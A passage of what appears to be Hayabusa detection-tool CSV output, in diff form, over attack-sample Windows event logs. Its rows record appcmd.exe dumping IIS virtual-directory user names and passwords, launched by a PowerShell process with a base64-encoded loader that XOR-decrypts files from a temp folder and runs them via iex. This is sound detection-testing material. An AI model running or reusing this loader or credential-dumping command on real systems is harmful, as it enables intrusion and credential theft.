AKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
